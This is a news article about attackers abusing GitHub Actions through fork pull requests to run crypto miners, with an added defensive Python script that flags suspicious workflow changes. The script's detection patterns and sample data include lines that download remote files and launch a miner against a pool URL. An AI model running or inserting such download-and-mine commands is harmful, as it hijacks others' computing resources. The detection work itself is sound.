Hackers target GitHub's server infrastructure to mine cryptocurrencies – Security Bitcoin News
GitHub's services are being investigated after a series of reports of attacks on its infrastructure involving unauthorized crypto mining apps. Cybercriminals have allegedly exploited security flaws that allow them to mine cryptocurrencies illegally.
Attacks use ‘GitHub Actions’
According to The Record, a Dutch security engineer, Justin Perdok, has discovered a cyber attacker targeting GitHub repositories. The attacks have been taking place since November 2020, the report says.
Perdok pointed out that the string of attacks “abused a GitHub feature called GitHub Actions”, which allows users to automatically run workflows and tasks when a certain event triggers them in a repository.
The threat actors target repositories where GitHub Actions is already enabled. The Record gave details of how the attack takes place:
The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and submitting a pull request to the original repository to merge the code back into the original.
However, the engineer made it clear that the attacker only needs to file the “pull request” to deploy the malicious workflows. Once loaded, GitHub’s systems are tricked into reading the attacker’s code and then automatically downloading crypto mining software.
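One way a maintainer could triage the pull requests described above, as an added example that is not from the original article or from GitHub: it flags fork pull requests that touch workflow files and add download or miner indicators. The input shape (`filename`, `patch`), the indicator patterns and the sample data are assumptions constructed for illustration.

```python
import re

# GitHub Actions loads workflow definitions from this directory.
WORKFLOW_PATH = re.compile(r"^\.github/workflows/[^/]+\.ya?ml$")

# Heuristic indicators: assumptions chosen for this example, not a complete list.
INDICATORS = [
    ("downloads a remote file", re.compile(r"\b(curl|wget)\b.*https?://", re.I)),
    ("names a miner binary", re.compile(r"srbminer", re.I)),
    ("mining pool URL", re.compile(r"stratum\+(tcp|ssl)://", re.I)),
]


def added_lines(patch):
    """Return the lines a unified-diff patch adds, without the leading '+'."""
    return [line[1:] for line in patch.splitlines()
            if line.startswith("+") and not line.startswith("+++")]


def review_pull_request(files, from_fork):
    """Return (path, reason) findings for workflow changes in a pull request."""
    findings = []
    for changed in files:
        path = changed["filename"]
        if not WORKFLOW_PATH.match(path):
            continue  # this check covers workflow definitions only
        if from_fork:
            findings.append((path, "workflow changed by a fork"))
        for line in added_lines(changed["patch"]):
            for reason, pattern in INDICATORS:
                if pattern.search(line):
                    findings.append((path, reason))
    return findings


# Constructed sample input: two changed files from a hypothetical fork PR.
SAMPLE_FILES = [
    {"filename": "README.md",
     "patch": "@@ -1 +1,2 @@\n # project\n+Run: curl https://example.invalid/i.sh"},
    {"filename": ".github/workflows/ci.yml",
     "patch": ("@@ -8,3 +8,6 @@\n"
               "       - uses: actions/checkout@v2\n"
               "+      - run: wget https://example.invalid/tool.tar.gz\n"
               "+      - run: tar xf tool.tar.gz && ./SRBMiner-MULTI\n"
               "+        env: {POOL: 'stratum+tcp://pool.example.invalid:3333'}\n")},
]

if __name__ == "__main__":
    for path, reason in review_pull_request(SAMPLE_FILES, from_fork=True):
        print(f"{path}: {reason}")
```

A workflow change from a fork is reported even when no indicator matches, so it can be held for manual review before any runner executes it.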
100 crypto mining apps deployed in a single attack
The malicious campaign seems more powerful than expected: according to the report, Perdok has already spotted hackers using nearly 100 crypto mining apps, such as SRBMiner, to mine multiple cryptocurrencies in a single attack.
However, the attack does not appear to pose a threat to users’ projects on the platform.
GitHub has already commented on the matter, saying it is aware of the issue and is “actively investigating”. However, Perdok stated that GitHub gave him the same comment last year when he reported the bug.